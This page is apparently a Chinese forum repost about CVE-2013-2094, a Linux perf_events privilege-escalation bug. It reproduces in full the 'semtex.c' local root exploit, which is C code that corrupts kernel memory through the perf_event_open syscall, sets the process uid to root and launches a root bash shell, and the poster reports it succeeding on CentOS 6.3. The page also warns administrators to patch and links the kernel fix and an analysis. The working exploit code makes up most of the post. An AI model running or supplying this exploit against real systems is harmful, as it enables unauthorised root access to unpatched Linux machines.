LInux 安全性測試

來源:互聯網
上載者:User

標籤:

[CVE-2013-2094]Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64踩(0)http://zone.wooyun.org/content/3733頂(33)GaRY  | 2013-05-14 15:54

http://sd.fucksheep.org/warez/semtex.c 

又一個linux安全的偶像sd牛剛剛發出的作品。。感覺上基本是個通殺的東西,但是目前為止,我的測試是rh6.3和centos6.3,2.6.32 kernel成功root,6.4上目前只是掛了系統,只能證明漏洞是存在的。 
待有緣人後來者修正之。 

也要預警各位,趕緊修複各自的伺服器。雖然貌似也就linux 3.8.10修了這個漏洞。。。 

/* 
* linux 2.6.37-3.x.x x86_64, ~100 LOC 
* gcc-4.6 -O2 semtex.c && ./a.out 
* 2010 [email protected], salut! 

* update may 2013: 
* seems like centos 2.6.32 backported the perf bug, lol. 
* jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. 
*/ 

#define _GNU_SOURCE 1 
#include <stdint.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <unistd.h> 
#include <sys/mman.h> 
#include <syscall.h> 
#include <stdint.h> 
#include <assert.h> 

#define BASE  0x380000000 
#define SIZE  0x010000000 
#define KSIZE  0x2000000 
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) 

void fuck() { 
  int i,j,k; 
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; 
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); 
  uint64_t kbase = ((uint64_t)current)>>36; 
  uint32_t *fixptr = (void*) AB(1); 
  *fixptr = -1; 

  for (i=0; i<4000; i+=4) { 
    uint64_t *p = (void *)&current[i]; 
    uint32_t *t = (void*) p[0]; 
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; 
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++) 
      if (((uint32_t*)uids)[k] != t[j+k]) goto next; 
      for (i = 0; i < 8; i++) t[j+i] = 0; 
      for (i = 0; i < 10; i++) t[j+9+i] = -1; 
      return; 
next:;    } 
  } 


void sheep(uint32_t off) { 
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; 
  int fd = syscall(298, buf, 0, -1, -1, 0); 
  assert(!close(fd)); 



int  main() { 
  uint64_t  u,g,needle, kbase, *p; uint8_t *code; 
  uint32_t *map, j = 5; 
  int i; 
  struct { 
    uint16_t limit; 
    uint64_t addr; 
  } __attribute__((packed)) idt; 
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); 
  memset(map, 0, SIZE); 
  sheep(-1); sheep(-2); 
  for (i = 0; i < SIZE/4; i++) if (map[i]) { 
    assert(map[i+1]); 
    break; 
  } 
  assert(i<SIZE/4); 
  asm ("sidt %0" : "=m" (idt)); 
  kbase = idt.addr & 0xff000000; 
  u = getuid(); g = getgid(); 
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); 
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024); 
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", 
    printf("2.6.37-3.x x86_64\[email protected] 2010\n") % 27); 
  setresuid(u,u,u); setresgid(g,g,g); 
  while (j--) { 
    needle = AB(j+1); 
    assert(p = memmem(code, 1024, &needle, 8)); 
    if (!p) continue; 
    *p = j?((g<<32)|u):(idt.addr + 0x48); 
  } 
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16); 
  asm("int $0x4");  assert(!setuid(0)); 
  return execl("/bin/bash", "-sh", NULL); 
}


----------------------------- 
5.15 update: 

最新訊息,CVE號已經出來了。[email protected]請叫我大神 CVE-2013-2094 
然後影響範圍也有所縮減,實際上是3.8.9就已經修複了此漏洞。 
其次這的確是個0day漏洞,目前各大廠商都還沒有給出正式的二進位hotfix patch。 
但是linux 核心上是有patch的,各位心急的可以參考下: 
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8176cced706b5e5d15887584150764894e94e02f 

如果你們對原理感興趣,不妨去看看spender對漏洞的解析: 
http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck

LInux 安全性測試

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.